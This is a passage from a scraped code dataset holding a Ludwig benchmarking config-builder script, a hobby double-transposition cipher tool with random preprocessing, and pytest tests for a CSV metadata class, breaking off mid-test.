"polygraphy.util", "line_number": 309, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 312, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 312, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 322, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 322, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 337, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 337, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 340, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 340, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 353, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 353, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 358, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 358, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 361, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 361, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 375, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config.get_flag", "line_number": 390, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 390, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 394, "usage_type": "call"}, {"api_name": "polygraphy.config.engine_capability", "line_number": 395, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 395, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 398, "usage_type": "call"}, {"api_name": "polygraphy.config.get_memory_pool_limit", "line_number": 400, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 400, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 408, "usage_type": "call"}, {"api_name": "polygraphy.config.get_tactic_sources", "line_number": 409, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 409, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 414, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 414, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 414, "usage_type": "attribute"}, {"api_name": "contextlib.suppress", "line_number": 417, "usage_type": "call"}, {"api_name": "polygraphy.config.profiling_verbosity", "line_number": 418, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 418, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 421, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 421, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 422, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 422, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 425, "usage_type": "call"}, {"api_name": "polygraphy.config.get_preview_feature", "line_number": 426, 
"usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 426, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 431, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 431, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 432, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 432, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 439, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 439, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 480, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 480, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 482, "usage_type": "call"}, {"api_name": "polygraphy.util.is_shape_dynamic", "line_number": 490, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 490, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 497, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 497, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 501, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 501, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 520, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 520, "usage_type": "name"}, {"api_name": "polygraphy.config.get_calibration_profile", "line_number": 529, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 529, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 531, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 531, "usage_type": "name"}, {"api_name": "polygraphy.exception.PolygraphyException", "line_number": 538, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 539, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 539, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 543, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 543, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 562, "usage_type": "call"}, {"api_name": "polygraphy.util.default", "line_number": 578, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 578, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 579, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 579, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 615, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 615, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 626, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 626, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 646, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 646, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 658, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 663, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 664, 
"usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 673, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 687, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 687, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 689, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 689, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 694, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 694, "usage_type": "name"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 695, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 695, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 704, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 704, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 705, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 705, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 706, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 706, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 710, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 710, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 716, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 716, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 729, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 729, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 731, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 740, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 740, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 742, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 751, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 751, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 768, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 768, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 772, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 772, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 781, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 781, "usage_type": "name"}]} +{"seq_id": "42742917788", "text": "import logging\nimport os\nimport pdb\n\nfrom copy import deepcopy\n\nimport yaml\n\nimport globals\nfrom globals import *\nfrom lbt.utils.experiment_utils import load_yaml\n\ntemplate = load_yaml(CONFIG_TEMPLATE_FILE)\ndataset_metadata = load_yaml(DATASET_METADATA_FILE)\nhyperopt_config = load_yaml(HYPEROPT_CONFIG_FILE)\n\n\ndef insert_global_vars(config):\n \"\"\" replace global variable placeholders with respective values \"\"\"\n for key, value in config.items():\n if type(value) != dict and value in vars(globals):\n config[key] = getattr(globals, value)\n\n\ndef 
build_config_files():\n config_fps = {}\n config = deepcopy(template)\n\n encoder_hyperopt_vals = []\n # select relevant encoders\n for encoder_filename in globals.ENCODER_FILE_LIST:\n with open(os.path.join(ENCODER_CONFIG_DIR, encoder_filename)) as f:\n encoder_hyperopt_params = yaml.load(f, Loader=yaml.SafeLoader)\n encoder_hyperopt_vals.append(encoder_hyperopt_params)\n\n # select relevant datasets\n selected_datasets = {}\n for dataset_name in globals.DATASETS_LIST:\n if dataset_name in dataset_metadata.keys():\n selected_datasets[dataset_name] = dataset_metadata[dataset_name]\n else:\n raise ValueError(\n \"The dataset you provided is not available.\"\n \"Please see list of available datasets here: \"\n \"python experiment_drivery.py --h\"\n )\n\n config[\"hyperopt\"].update(hyperopt_config)\n\n for dataset, metadata in selected_datasets.items():\n # each dataset will have a model specific config file\n config_fps[dataset] = []\n\n for idx, input_feature_name in enumerate(metadata[\"input_features\"]):\n ipt_feat = deepcopy(config[\"input_features\"][0])\n ipt_feat[\"name\"] = input_feature_name[\"name\"]\n ipt_feat[\"type\"] = input_feature_name[\"type\"]\n if idx == 0:\n config[\"input_features\"] = [ipt_feat]\n else:\n config[\"input_features\"].append(ipt_feat)\n for idx, output_feature_info in enumerate(metadata[\"output_features\"]):\n out_feat = deepcopy(config[\"output_features\"][0])\n out_feat[\"name\"] = output_feature_info[\"name\"]\n out_feat[\"type\"] = output_feature_info[\"type\"]\n if idx == 0:\n config[\"output_features\"] = [out_feat]\n else:\n config[\"output_features\"].append(out_feat)\n\n if len(metadata[\"output_features\"]) > 1:\n config[\"hyperopt\"][\"output_feature\"] = \"combined\"\n else:\n config[\"hyperopt\"][\"output_feature\"] = metadata[\"output_features\"][\n 0\n ][\"name\"]\n\n input_feature_names = metadata[\"input_features\"]\n output_feature_names = metadata[\"output_features\"]\n\n for encoder_hyperopt_params in encoder_hyperopt_vals:\n curr_config = deepcopy(config)\n encoder_name = encoder_hyperopt_params[\"parameters\"][\n \"input_features.name.encoder\"\n ]\n\n # update input and output parameters (not preprocessing)\n for idx in range(len(curr_config[\"input_features\"])):\n curr_config[\"input_features\"][idx].update(\n encoder_hyperopt_params[\"input_features\"][idx]\n )\n insert_global_vars(curr_config[\"input_features\"][idx])\n\n for idx in range(len(curr_config[\"output_features\"])):\n if \"output_features\" in encoder_hyperopt_params.keys():\n curr_config[\"output_features\"][idx].update(\n encoder_hyperopt_params[\"output_features\"][idx]\n )\n insert_global_vars(curr_config[\"output_features\"][idx])\n\n # handle encoder specific preprocessing\n for idx in range(len(curr_config[\"input_features\"])):\n try:\n preprocessing = curr_config[\"input_features\"][idx][\n \"preprocessing\"\n ]\n for key, _ in preprocessing.items():\n preprocessing[key] = encoder_hyperopt_params[\n \"input_features\"\n ][idx][\"preprocessing\"][key]\n\n except:\n pass #no preprocessing param\n # handle encoder specific training params\n if \"training\" in encoder_hyperopt_params.keys():\n curr_config[\"training\"].update(\n encoder_hyperopt_params[\"training\"]\n )\n\n def input_or_output_feature(param_key):\n if param_key.split(\".\")[0] == \"input_features\":\n return True\n return False\n\n # handle encoder specific hyperopt\n input_encoder_hyperopt_params = {\n \"parameters\": {\n input_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for 
input_feat in input_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and input_or_output_feature(key)\n }\n }\n\n # handle encoder specific hyperopt\n output_encoder_hyperopt_params = {\n \"parameters\": {\n output_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for output_feat in output_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and not input_or_output_feature(key)\n }\n }\n\n ds_encoder_hyperopt_params = {\n \"parameters\": {\n **output_encoder_hyperopt_params[\"parameters\"],\n **input_encoder_hyperopt_params[\"parameters\"],\n }\n }\n curr_config[\"input_features\"][0][\"encoder\"] = encoder_name\n\n # populate hyperopt parameters w/encoder specific settings\n curr_config[\"hyperopt\"].update(\n {\n \"parameters\": {\n **ds_encoder_hyperopt_params[\"parameters\"],\n **hyperopt_config[\"parameters\"],\n }\n }\n )\n\n config_fp = os.path.join(\n EXPERIMENT_CONFIGS_DIR, f\"config_{dataset}_{encoder_name}.yaml\"\n )\n with open(config_fp, \"w\") as f:\n yaml.dump(curr_config, f)\n\n config_fps[dataset].append(config_fp)\n\n return config_fps\n", "repo_name": "HazyResearch/ludwig-benchmarking-toolkit", "sub_path": "lbt/build_def_files.py", "file_name": "build_def_files.py", "file_ext": "py", "file_size_in_byte": 6799, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 13, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 14, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 15, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 27, "usage_type": "call"}, {"api_name": "globals.ENCODER_FILE_LIST", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 33, "usage_type": "call"}, {"api_name": "yaml.SafeLoader", "line_number": 33, "usage_type": "attribute"}, {"api_name": "globals.DATASETS_LIST", "line_number": 38, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 55, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "70111771687", "text": "\"\"\"\r\nThe python code here implements a cipher that I am calling Randomness Hardened Double Transposition(RHDT)\r\n\r\n---LICENSE---\r\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with this program. 
If not, see .\r\nCopyright cryptoam 2023\r\n\"\"\"\r\nimport secrets\r\n\r\ndef main():\r\n print(\"This is the RHDT tool\")\r\n print(\"All inputs must be uppercase letters with no symbols or spaces\")\r\n print(\"Program is liable to crash or malfunction if invalid input is provided\")\r\n exit_enable=False\r\n while exit_enable==False:\r\n mode=input(\"Encrypt(E) or Decrypt(D) or Exit(EXIT)?\\n--->\")\r\n if mode==\"E\":\r\n encrypt_mode()\r\n elif mode==\"D\":\r\n decrypt_mode()\r\n elif mode==\"EXIT\":\r\n exit_enable=True\r\n else:\r\n print(\"Invalid entry, try again\")\r\n input(\"Press enter to end program\")\r\n\r\ndef encrypt_mode():\r\n print(\"In encryption mode now\")\r\n plaintext=input(\"What is the plaintext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Plaintext is: \"+plaintext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=preprocess_forward(plaintext)\r\n ciphertext=double_transpose_encrypt(preprocessed_plaintext, key1, key2)\r\n print(\"Ciphertext is: \"+ciphertext)\r\n\r\ndef decrypt_mode():\r\n print(\"In decryption mode now\")\r\n ciphertext=input(\"What is the ciphertext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Ciphertext is: \"+ciphertext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=double_transpose_decrypt(ciphertext, key1, key2)\r\n plaintext=preprocess_backward(preprocessed_plaintext)\r\n print(\"Plaintext is: \"+plaintext)\r\n\r\ndef preprocess_forward(plaintext):\r\n # Convert the plaintext into a stream of 0-25\r\n plaintext_stream=[]\r\n for char in plaintext:\r\n num=ord(char)-ord(\"A\")\r\n plaintext_stream.append(num)\r\n # Obtain an actually random(read: unpredictable to adversary) stream of 0-25\r\n random_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n random_num=secrets.randbelow(26)\r\n random_stream.append(random_num)\r\n # Now start crossing the streams\r\n # :P\r\n preprocessed_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n char_num=plaintext_stream[i]\r\n random_num=random_stream[i]\r\n a=((2*char_num)+random_num)%26\r\n b=(char_num+random_num)%26\r\n preprocessed_stream.append(a)\r\n preprocessed_stream.append(b)\r\n # Convert the numbers in the preprocessed stream back into letters\r\n preprocessed_plaintext=\"\"\r\n for num in preprocessed_stream:\r\n char=chr(num+ord(\"A\"))\r\n preprocessed_plaintext=preprocessed_plaintext+char\r\n return(preprocessed_plaintext)\r\n\r\ndef preprocess_backward(preprocessed_plaintext):\r\n # Convert the preprocessed plaintext into a stream of 0-25\r\n number_stream=[]\r\n for char in preprocessed_plaintext:\r\n num=ord(char)-ord(\"A\")\r\n number_stream.append(num)\r\n # Convert the stream of numbers into a stream of tuples (a,b)\r\n tuple_stream=[]\r\n for i in range(0, len(number_stream), 2):\r\n tuple_stream.append((number_stream[i],number_stream[i+1]))\r\n # Now we process each tuple to recover the plaintext number\r\n plaintext_stream=[]\r\n for tup in tuple_stream:\r\n a=tup[0]\r\n b=tup[1]\r\n c=a-b\r\n if c<0:\r\n plaintext_num=c+26\r\n else:\r\n plaintext_num=c\r\n plaintext_stream.append(plaintext_num)\r\n # Finally recover the plaintext from the stream of 0-25\r\n plaintext=\"\"\r\n for num in plaintext_stream:\r\n char=chr(num+ord(\"A\"))\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef transpose_encrypt(plaintext, 
key):\r\n columns = len(key)\r\n rows = (len(plaintext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the plaintext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Fill the grid with the plaintext\r\n index = 0\r\n for row in range(rows):\r\n for col in range(columns):\r\n if index < len(plaintext):\r\n grid[row][col] = plaintext[index]\r\n index=index+1\r\n else:\r\n grid[row][col]=\"$\"\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Create a new grid\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Fill in the new grid according the the sorted collum\r\n for row in range(rows):\r\n for col in range(columns):\r\n new_grid[row][col]=grid[row][sorted_columns[col]]\r\n # Extract the ciphertext from the new grid using the sorted columns \r\n ciphertext = \"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass\r\n else:\r\n ciphertext=ciphertext+char\r\n return (ciphertext)\r\n\r\ndef transpose_decrypt(ciphertext, key):\r\n columns = len(key)\r\n rows = (len(ciphertext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the ciphertext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Fill in the grid for the full rows\r\n index = 0\r\n for row in range(rows-1):\r\n for col in range(columns):\r\n if index < len(ciphertext):\r\n grid[row][col] = ciphertext[index]\r\n index=index+1\r\n # We need to be careful now\r\n # The last row is not garunteed to be full, must now perform a check\r\n a=(len(ciphertext)%columns)\r\n if a==0:\r\n # We do not need to worry, we can just carry on\r\n # The length of the ciphertext is a multiple of the key, there will not be mismatched column lengths\r\n for col in range(columns):\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n else:\r\n # Turns out we do need to worry, column lengths will be mismatched\r\n for col in range(columns):\r\n current_collum_index=sorted_columns[col]\r\n if current_collum_index>=a:\r\n #We are writing to a column that does not have a character, pad it instead\r\n grid[rows-1][col]=\"$\"\r\n else:\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Copy characters over to the new grid but this time with the collumns in the right place\r\n index=0\r\n for col in sorted_columns:\r\n for row in range(rows):\r\n char=grid[row][index]\r\n new_grid[row][col]=char\r\n index=index+1\r\n # Extract the plaintext from the grid\r\n plaintext=\"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass #padding, ignore and move on to the next one\r\n else:\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef double_transpose_encrypt(plaintext, key1, key2):\r\n partial_encrypt=transpose_encrypt(plaintext, key1)\r\n ciphertext=transpose_encrypt(partial_encrypt, key2)\r\n return(ciphertext)\r\n\r\ndef double_transpose_decrypt(ciphertext, key1, key2):\r\n partial_decrypt=transpose_decrypt(ciphertext, key2)\r\n 
plaintext=transpose_decrypt(partial_decrypt, key1)\r\n return(plaintext)\r\n\r\nif __name__==\"__main__\":\r\n main()", "repo_name": "cryptoam322/RHDT-cipher", "sub_path": "RDHT-cipher_final.py", "file_name": "RDHT-cipher_final.py", "file_ext": "py", "file_size_in_byte": 8587, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "secrets.randbelow", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "24775054719", "text": "import pytest\nimport csv\nimport mock\nfrom unittest.mock import patch\nimport os\nfrom ..DataFile import Metadata, DataFile, Relation, _convert_string_to_number\n\nMANUFACTURER_VALUES = {\"Toyota\": 2, \"Volkswagon\": 1, \"Ferrari\": 1}\nMODEL_VALUES = {\"Camry\": 1, \"GTI\": 1, \"Corolla\": 1, \"Dino 246 GT\": 1}\nCOLOR_VALUES = {\"Gray\": 1, \"White\": 1, \"Black\": 1, \"Red\": 1}\nCOST_QUANT_VALUES = [\"$15,000\", \"$20,000\", \"$10,000\"]\nCOST_QUAL_VALUES = {\"N.A.\": 1}\nMPG_VALUES = [25.4, 23.2, 28.2, 18.2]\nEMPTY_VALUES = {}\n'''\nReturn a very simple, fake CSV file for testing\n'''\n@pytest.fixture()\ndef simple_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",\"25.4\",\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",\"23.2\",\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",\"28.2\",\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",\"18.2\",N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\ndef create_simple_csv(file_name=\"../test_data/simple.csv\"):\n data = [\n ['Manufacturer','Model','Color','Miles','MPG','Cost'],\n ['Toyota','Camry','Gray','75,000','25.4','$15,000'],\n ['Volkswagon','GTI','White','75,000','23.2','$20,000'],\n ['Toyota','Corolla','Black','100,000','28.2','$10,000'],\n ['Ferrari','Dino 246 GT','Red','252,346','18.2','N.A.'],\n ]\n if not os.path.isfile(file_name):\n test_file = open(file_name, \"w\", newline=\"\\n\")\n writer = csv.writer(test_file)\n writer.writerows(data)\n test_file.close()\n\n@pytest.fixture()\ndef update_cost_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,-1\\n'\n )\n return mock.mock_open(read_data=data)\n\n@pytest.fixture()\ndef update_miles_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"76,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\n'''\nBuild a test string for the metadata\n'''\ndef build_metadata_string(number, name, datatype, qual_values:dict, quant_values:list):\n string = f\"\\n datatype:{datatype}\"\n if qual_values:\n string = string + f\"; qual_values_count:{len(qual_values.keys())}\"\n if quant_values:\n string = string + f\"; quant_values_count:{len(quant_values)}\"\n if qual_values:\n string = string + f\"\\nQualitative Values ['Value': count]: {qual_values}\"\n return string\n\n'''\nTest validity of metadata object\n'''\ndef run_metadata_asserts(metadata, number, name, correct_qual_values:dict, quant_count, datatype):\n assert(metadata.name == name)\n assert(metadata.number == number)\n assert(metadata.qualitative_values == correct_qual_values)\n assert(metadata.datatype == datatype)\n 
assert(metadata.quantitative_values_count == quant_count)\n return True\n\n'''\nTest init to:\n\n-Make sure that column titles are added as attributes\n-Make sure data populates correctly\n'''\ndef test_init(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n assert(run_metadata_asserts(test_file.Manufacturer, 0, \"Manufacturer\", MANUFACTURER_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Model, 1, \"Model\", MODEL_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Color, 2, \"Color\", COLOR_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Miles, 3, \"Miles\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.MPG, 4, \"MPG\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.Cost, 5, \"Cost\", {\"N.A.\": 1}, 3, \"both\"))\n\ndef test_create_file(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n alt_file = DataFile.create(\"../test_data/Data.csv\")\n\n assert(test_file == alt_file)\n\ndef test_show_metadata_qual_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MANUFACTURER_META_REPORT = build_metadata_string(0, \"Manufacturer\", \"qualitative\", MANUFACTURER_VALUES, EMPTY_VALUES)\n manufacturer_report = test_file.show_metadata(\"Manufacturer\")\n assert(MANUFACTURER_META_REPORT == manufacturer_report)\n\ndef test_show_metadata_quant_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MPG_META_REPORT = build_metadata_string(4, \"MPG\", \"quantitative\", EMPTY_VALUES, MPG_VALUES)\n MPG_report = test_file.show_metadata(\"MPG\")\n assert(MPG_META_REPORT == MPG_report)\n\ndef test_show_metadata_both_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n COST_META_REPORT = build_metadata_string(5, \"Cost\", \"both\", COST_QUAL_VALUES, COST_QUANT_VALUES)\n cost_report = test_file.show_metadata(\"Cost\")\n assert(COST_META_REPORT == cost_report)\n\ndef test_update_column_value_no_kwargs(update_cost_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(\"N.A.\", -1,\"Cost\", new_file_name=destination_file)\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with 